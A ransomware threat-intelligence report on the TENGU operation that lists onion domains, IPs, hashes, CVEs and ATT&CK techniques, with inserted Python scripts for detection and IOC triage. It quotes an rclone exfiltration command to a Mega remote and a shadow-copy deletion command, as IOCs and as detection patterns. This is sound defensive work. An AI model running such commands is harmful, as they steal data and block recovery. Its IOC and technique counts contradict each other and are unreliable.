TENGU Ransomware: IOC Intelligence Report 2026

Date: 18 Jun 2026
Actor: tengu
Type: Ransomware
Country: Unknown
Sector: -
Confidence: high (100)
Analytical priority: High

Based on actor, country, IOCs, TTPs, leak data and context quality.

30 IOCs | 8 TTPs | Actor: tengu | Country: Unknown
Executive Summary
Artifacts identified as associated with TENGU Ransomware (TenguLocker / TenguRaaS). This ransomware-as-a-service operation runs through .onion sites, uses tools such as ScreenConnect and WinSCP for remote access, relies on native Windows LOLBins for evasion, and exfiltrates data via rclone to Mega.nz.

Key Points

  • Contact: [email protected] / [email protected]
  • Twitter/X: @TenguRaaS
  • Mode: Ransomware-as-a-Service (RaaS)
  • Exfiltration: rclone -> Mega.nz
  • Tools: ScreenConnect, WinSCP, rclone
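The two command-line IOCs the report lists (shadow copy deletion with vssadmin and a throttled rclone copy to a Mega remote) are the kind of process-creation events a SOC wants a rule for. The script below is an added example and is not part of the original report; the event lines are constructed to resemble Sysmon Event ID 1 summaries in a hypothetical "timestamp host user command" layout, and the rule names and field names are assumptions.

```python
"""Process-creation detection for the two TENGU command IOCs in the report.

Added example, not from the original report. Event lines are constructed
(hypothetical "<timestamp> <host> <user> <command line>" layout), not real
telemetry.
"""
import re

# Constructed sample events, including two that must NOT alert.
SAMPLE_EVENTS = [
    "2026-06-18T09:12:01Z WS-014 corp\\jdoe C:\\Windows\\System32\\vssadmin.exe delete shadows /all /quiet",
    "2026-06-18T09:12:05Z WS-014 corp\\jdoe C:\\Windows\\System32\\vssadmin.exe list shadows",
    "2026-06-18T09:20:44Z FS-02 corp\\svc_backup C:\\Tools\\rclone.exe copy C:\\Staging\\Data mega_remote:Exfiltrated_Data --bwlimit 5M -q",
    "2026-06-18T10:02:33Z WS-021 corp\\asmith C:\\Windows\\System32\\notepad.exe README.txt",
]

EVENT_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<user>\S+) (?P<cmd>.+)$")

RULES = [
    {
        "name": "Shadow copy deletion via vssadmin",
        "technique": "T1490",
        # image name at start or after a path separator, then the delete verb
        "pattern": re.compile(r"(?:^|\\)vssadmin(?:\.exe)?\s+delete\s+shadows\b", re.IGNORECASE),
    },
    {
        "name": "rclone transfer to a configured remote",
        "technique": "T1567.002",
        # rclone copy/sync/move whose destination is '<remote>:<path>'.
        # The remote name needs 2+ characters so a local drive letter such
        # as 'D:' is not mistaken for a cloud remote.
        "pattern": re.compile(
            r"(?:^|\\)rclone(?:\.exe)?\s+(?:copy|sync|move)\s+\S+\s+[A-Za-z0-9_-]{2,}:\S*",
            re.IGNORECASE,
        ),
    },
]


def parse_event(line):
    """Split one constructed event line into its fields, or None if malformed."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def evaluate(line):
    """Return the list of alert dicts raised by one event line."""
    ev = parse_event(line)
    if ev is None:
        return []
    alerts = []
    for rule in RULES:
        if rule["pattern"].search(ev["cmd"]):
            alert = {"rule": rule["name"], "technique": rule["technique"],
                     "host": ev["host"], "user": ev["user"], "ts": ev["ts"]}
            # A bandwidth-limited upload is easy to miss in volume-based
            # alerting, so surface the flag explicitly for the analyst.
            if rule["technique"] == "T1567.002" and "--bwlimit" in ev["cmd"]:
                alert["note"] = "bandwidth-limited transfer"
            alerts.append(alert)
    return alerts


def scan(lines):
    """Evaluate every line and return all alerts in event order."""
    return [alert for line in lines for alert in evaluate(line)]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Both rules key on the command line rather than the image path, so a renamed rclone binary still matches as long as the verb and remote syntax are present; pair them with a parent-process condition in production to keep backup jobs from firing the rclone rule.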

Key data

Indicators of Compromise (IOCs)

Table of 141 identified artifacts of various kinds: commands, CVEs, onion domains, IPs, hashes, emails, files, LOLBins, paths, registry keys, tools and MITRE ATT&CK techniques.

Type | Value | Context
COMMAND | rclone copy C:\Staging\Data mega_remote:Exfiltrated_Data --bwlimit 5M -q | TENGU
COMMAND | vssadmin delete shadows /all /quiet | TENGU
CVE | CVE-2020-1472 | TENGU
CVE | CVE-2026-23477 | TENGU
CVE | CVE-2025-43995 | TENGU
CVE | CVE-2024-38178 | TENGU
CVE | CVE-2025-55754 | TENGU
CVE | CVE-2026-20253 | TENGU
DOMAIN | fuvodyoktsjdwu3mrbbrmdsmtblkxau6l7r5dygfwgzhf36mabjtcjad.onion | TENGU
DOMAIN | longcc4fqrfcqt5lzceutylaxir6h66fp6df3oin6mvwvz6pfdbxc6qd.onion | TENGU
DOMAIN | longejh5gj5igfinj36rmqt2ydx2vun6zmditi3ij6hebawnn4xucqad.onion | TENGU
DOMAIN | longf6faa6tiudn5n6ar77z5balign2cxo2tjfsxuf6wnlzjamqew2yd.onion | TENGU
DOMAIN | longhbqhzlv3p7tvx3iwhfizkmtkm2nhnlbw5d4qr65wjz5e6aa23mid.onion | TENGU
DOMAIN | longjr5sl6a57ajn52nysmvgobmb7lktjthssmt2jeyjagk3rw36djyd.onion | TENGU
DOMAIN | longvqprqrb4zbxooswz4upefhtikhnyqv4gw4fkzpkc2wjpvxsucwid.onion | TENGU
DOMAIN | howdkesnbd7yh7r7h7uns4yylu6cjxs4tus64foquq5a2bzml2ur6uqd.onion | TENGU
DOMAIN | www.torproject.org | TENGU
DOMAIN | shisha.tengu | TENGU
DOMAIN | Mega.nz | TENGU
EMAIL | [email protected] | TENGU
EMAIL | [email protected] | TENGU
FILE | rand.README.txt | TENGU
FILE | wraithnet_bot.exe | TENGU
FILE | controller_gui.exe | TENGU
FILE | controller_console.exe | TENGU
FILE | README.txt | TENGU
FILE | wraithnet.log | TENGU
FILE | 8F2Z-README.txt | TENGU
FILE | TENGU.README.txt | TENGU
FILE | TENGU_README.txt | TENGU
HASH | FAFB6C5E12DFEEFABA5AC8982D5BB13DD206CFCD328B9D36AA87257F762EE24A | TENGU
HASH | DFBC9412BE99B25137AB6AB575489A93 | TENGU
HASH | 62c6ba7f5356663c46b8918b6a0994fc | TENGU
HASH | b400c58e7e227361cc689078ce9163c4 | TENGU
HASH | 3b18e9da970fa7d336b08c5df04668b7 | TENGU
HASH | 511a4780cbd9ed2280b432afc6cbfd1a | TENGU
HASH | b8c81e1e17adcaf9e84d76401697b7e5 | TENGU
HASH | 7ac4f264f595e15f77025527994b74e5 | TENGU
IP | 110.227.205.232 | TENGU
IP | 123.255.248.97 | TENGU
IP | 94.26.88.100 | TENGU
IP | 94.26.88.101 | TENGU
IP | 94.26.88.102 | TENGU
IP | 117.240.9.147 | TENGU
IP | 206.168.81.33 | TENGU
IP | 61.0.226.126 | TENGU
IP | 149.88.72.63 | TENGU
IP | 194.165.16.164 | TENGU
IP | 194.165.16.167 | TENGU
IP | 45.227.254.156 | TENGU
IP | 88.214.25.125 | TENGU
IP | 91.238.181.93 | TENGU
IP | 91.238.181.95 | TENGU
IP | 94.26.88.103 | TENGU
IP | 117.239.53.213 | TENGU
IP | 117.244.244.52 | TENGU
IP | 192.168.1.3 | TENGU
IP | 103.80.211.131 | TENGU
IP | 117.250.6.65 | TENGU
IP | 122.129.85.250 | TENGU
IP | 185.11.61.27 | TENGU
IP | 192.168.1.106 | TENGU
IP | 192.168.1.75 | TENGU
IP | 194.165.16.161 | TENGU
IP | 194.165.16.163 | TENGU
IP | 45.227.254.151 | TENGU
IP | 45.227.254.152 | TENGU
IP | 45.227.254.153 | TENGU
IP | 49.51.142.252 | TENGU
IP | 71.6.134.232 | TENGU
IP | 88.214.25.121 | TENGU
IP | 91.238.181.96 | TENGU
LOLBIN | rundll32.exe | TENGU
LOLBIN | powershell.exe | TENGU
LOLBIN | cmd.exe | TENGU
LOLBIN | schtasks.exe | TENGU
LOLBIN | sc.exe | TENGU
LOLBIN | wevtutil | TENGU
LOLBIN | vssadmin | TENGU
LOLBIN | rclone | TENGU
MITRE | T1078 | TENGU
MITRE | T1190 | TENGU
MITRE | T1490 | TENGU
MITRE | T1486 | TENGU
MITRE | T1567 | TENGU
MITRE | T1041 | TENGU
MITRE | T1070 | TENGU
MITRE | T1218 | TENGU
MITRE | T1046 | TENGU
MITRE | T1133 | TENGU
MITRE | T1566 | TENGU
MITRE | T1059 | TENGU
MITRE | T1562 | TENGU
MITRE | T1074 | TENGU
MITRE | T1547.001 | TENGU
MITRE | T1003 | TENGU
MITRE | T1555 | TENGU
MITRE | T1018 | TENGU
MITRE | T1021 | TENGU
MITRE | T1059.001 | TENGU
MITRE | T1059.003 | TENGU
MITRE | T1566.002 | TENGU
MITRE | T1068 | TENGU
MITRE | T1021.001 | TENGU
MITRE | T1039 | TENGU
MITRE | T1552 | TENGU
MITRE | T1005 | TENGU
MITRE | T1565 | TENGU
MITRE | T1567.002 | TENGU
MITRE | T1218.011 | TENGU
MITRE | T1003.001 | TENGU
MITRE | T1562.001 | TENGU
MITRE | T1070.001 | TENGU
MITRE | T1595.002 | TENGU
MITRE | T1219 | TENGU
MITRE | T1078.002 | TENGU
MITRE | T1110.001 | TENGU
MITRE | T1110.003 | TENGU
MITRE | T1087.002 | TENGU
MITRE | T1021.002 | TENGU
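Not every row in a table like this is safe to push to a blocklist unchanged: the IP column mixes public addresses with RFC 1918 hosts (192.168.1.3, 192.168.1.106, 192.168.1.75, which are internal victims or lab machines, not attacker infrastructure), the domain column includes legitimate services (www.torproject.org, Mega.nz) and the hash column mixes MD5 and SHA-256 digests. The following script is an added example, not part of the original report: it parses rows in the Type | Value | Context shape used above (a constructed subset of the report's own values) and sorts them by fidelity before they reach a detection platform. The benign-service and generic-filename lists are the analyst's assumptions, not something the report states.

```python
"""IOC triage helper for a flattened intel-report table.

Added example, not part of the original report. Ingests 'TYPE|VALUE|CONTEXT'
rows and separates actionable indicators from low-fidelity ones (private or
reserved addresses, legitimate services, generic filenames) and from values
that are not well-formed at all.
"""
import ipaddress
import re

# Constructed sample: a subset of the report's rows plus one malformed hash.
SAMPLE_ROWS = """\
IP|94.26.88.100|TENGU
IP|192.168.1.3|TENGU
IP|192.168.1.106|TENGU
DOMAIN|www.torproject.org|TENGU
DOMAIN|Mega.nz|TENGU
DOMAIN|fuvodyoktsjdwu3mrbbrmdsmtblkxau6l7r5dygfwgzhf36mabjtcjad.onion|TENGU
HASH|FAFB6C5E12DFEEFABA5AC8982D5BB13DD206CFCD328B9D36AA87257F762EE24A|TENGU
HASH|62c6ba7f5356663c46b8918b6a0994fc|TENGU
HASH|zz|TENGU
FILE|README.txt|TENGU
"""

# Legitimate services that appear in the table; blocking them outright would
# break real users, so they are downgraded. (Assumption: analyst's judgment.)
BENIGN_SERVICE_DOMAINS = {"www.torproject.org", "mega.nz"}

# File names too generic to alert on by themselves. (Assumption.)
GENERIC_FILENAMES = {"readme.txt"}

HASH_ALGO_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256"}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def parse_rows(text):
    """Parse 'TYPE|VALUE|CONTEXT' lines into dicts, skipping blank lines."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ioc_type, value, context = line.split("|", 2)
        rows.append({"type": ioc_type.strip(), "value": value.strip(),
                     "context": context.strip()})
    return rows


def classify(row):
    """Return (fidelity, reason); fidelity is 'high', 'low' or 'invalid'."""
    ioc_type, value = row["type"], row["value"]
    if ioc_type == "IP":
        try:
            ip = ipaddress.ip_address(value)
        except ValueError:
            return "invalid", "not an IP address"
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            return "low", "private/reserved address: internal host, not attacker infrastructure"
        return "high", "public address"
    if ioc_type == "DOMAIN":
        if value.lower() in BENIGN_SERVICE_DOMAINS:
            return "low", "legitimate service abused by many actors"
        if value.lower().endswith(".onion"):
            return "high", "actor-controlled onion service"
        return "high", "domain"
    if ioc_type == "HASH":
        algo = HASH_ALGO_BY_LEN.get(len(value))
        if algo is None or not HEX_RE.match(value):
            return "invalid", "unrecognised hash format"
        return "high", algo
    if ioc_type == "FILE":
        if value.lower() in GENERIC_FILENAMES:
            return "low", "generic filename"
        return "high", "filename"
    return "high", ioc_type.lower()


def triage(text):
    """Group normalised IOCs by fidelity; hashes and domains are lower-cased."""
    buckets = {"high": [], "low": [], "invalid": []}
    for row in parse_rows(text):
        fidelity, reason = classify(row)
        value = row["value"]
        if row["type"] in ("HASH", "DOMAIN"):
            value = value.lower()
        buckets[fidelity].append((row["type"], value, reason))
    return buckets


if __name__ == "__main__":
    for fidelity, items in triage(SAMPLE_ROWS).items():
        print(f"== {fidelity} ({len(items)})")
        for ioc_type, value, reason in items:
            print(f"{ioc_type:7} {value:66} {reason}")
```

Only the "high" bucket should feed automated blocking; the "low" bucket is still useful as enrichment context (for example, a private address may identify the first compromised host in the source incident) and the "invalid" bucket points at rows that need to be re-extracted from the original source.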

MITRE ATT&CK Techniques

More than 30 MITRE techniques were identified, including T1078 (Valid Accounts), T1190 (Exploit Public-Facing Application), T1486 (Data Encrypted for Impact), T1041 (Exfiltration Over C2 Channel), T1562 (Impair Defenses), T1567 (Exfiltration Over Web Service), T1070 (Indicator Removal), T1218 (Signed Binary Proxy Execution), T1003 (OS Credential Dumping) and T1490 (Inhibit System Recovery), among others.

Diamond Model

Adversary: tengu
Victim: TENGU Ransomware Intelligence
Capability: Ransomware (8 MITRE TTPs)
Infrastructure:
  fuvodyoktsjdwu3mrbbrmdsmtblkxau6l7r5dygfwgzhf36mabjtcjad.onion
  longcc4fqrfcqt5lzceutylaxir6h66fp6df3oin6mvwvz6pfdbxc6qd.onion
  longejh5gj5igfinj36rmqt2ydx2vun6zmditi3ij6hebawnn4xucqad.onion
  longf6faa6tiudn5n6ar77z5balign2cxo2tjfsxuf6wnlzjamqew2yd.onion

Indicators of Compromise (IOCs) with OSINT sources

Type | Value | Context | OSINT
COMMAND | rclone copy C:\Staging\Data mega_remote:Exfiltrated_Data --bwlimit 5M -q | TENGU | VT OffSec SOCRadar
COMMAND | vssadmin delete shadows /all /quiet | TENGU | VT OffSec SOCRadar
CVE | CVE-2020-1472 | TENGU | VT OffSec SOCRadar
CVE | CVE-2026-23477 | TENGU | VT OffSec SOCRadar
CVE | CVE-2025-43995 | TENGU | VT OffSec SOCRadar
CVE | CVE-2024-38178 | TENGU | VT OffSec SOCRadar
CVE | CVE-2025-55754 | TENGU | VT OffSec SOCRadar
CVE | CVE-2026-20253 | TENGU | VT OffSec SOCRadar
DOMAIN | fuvodyoktsjdwu3mrbbrmdsmtblkxau6l7r5dygfwgzhf36mabjtcjad.onion | TENGU | VT OffSec SOCRadar
DOMAIN | longcc4fqrfcqt5lzceutylaxir6h66fp6df3oin6mvwvz6pfdbxc6qd.onion | TENGU | VT OffSec SOCRadar
DOMAIN | longejh5gj5igfinj36rmqt2ydx2vun6zmditi3ij6hebawnn4xucqad.onion | TENGU | VT OffSec SOCRadar
DOMAIN | longf6faa6tiudn5n6ar77z5balign2cxo2tjfsxuf6wnlzjamqew2yd.onion | TENGU | VT OffSec SOCRadar
DOMAIN | longhbqhzlv3p7tvx3iwhfizkmtkm2nhnlbw5d4qr65wjz5e6aa23mid.onion | TENGU | VT OffSec SOCRadar
DOMAIN | longjr5sl6a57ajn52nysmvgobmb7lktjthssmt2jeyjagk3rw36djyd.onion | TENGU | VT OffSec SOCRadar
DOMAIN | longvqprqrb4zbxooswz4upefhtikhnyqv4gw4fkzpkc2wjpvxsucwid.onion | TENGU | VT OffSec SOCRadar
DOMAIN | howdkesnbd7yh7r7h7uns4yylu6cjxs4tus64foquq5a2bzml2ur6uqd.onion | TENGU | VT OffSec SOCRadar
DOMAIN | www.torproject.org | TENGU | VT OffSec SOCRadar
DOMAIN | shisha.tengu | TENGU | VT OffSec SOCRadar
DOMAIN | Mega.nz | TENGU | VT OffSec SOCRadar
EMAIL | [email protected] | TENGU | VT OffSec SOCRadar
EMAIL | [email protected] | TENGU | VT OffSec SOCRadar
FILE | rand.README.txt | TENGU | VT OffSec SOCRadar
FILE | wraithnet_bot.exe | TENGU | VT OffSec SOCRadar
FILE | controller_gui.exe | TENGU | VT OffSec SOCRadar
FILE | controller_console.exe | TENGU | VT OffSec SOCRadar
FILE | README.txt | TENGU | VT OffSec SOCRadar
FILE | wraithnet.log | TENGU | VT OffSec SOCRadar
FILE | 8F2Z-README.txt | TENGU | VT OffSec SOCRadar
FILE | TENGU.README.txt | TENGU | VT OffSec SOCRadar
FILE | TENGU_README.txt | TENGU | VT OffSec SOCRadar
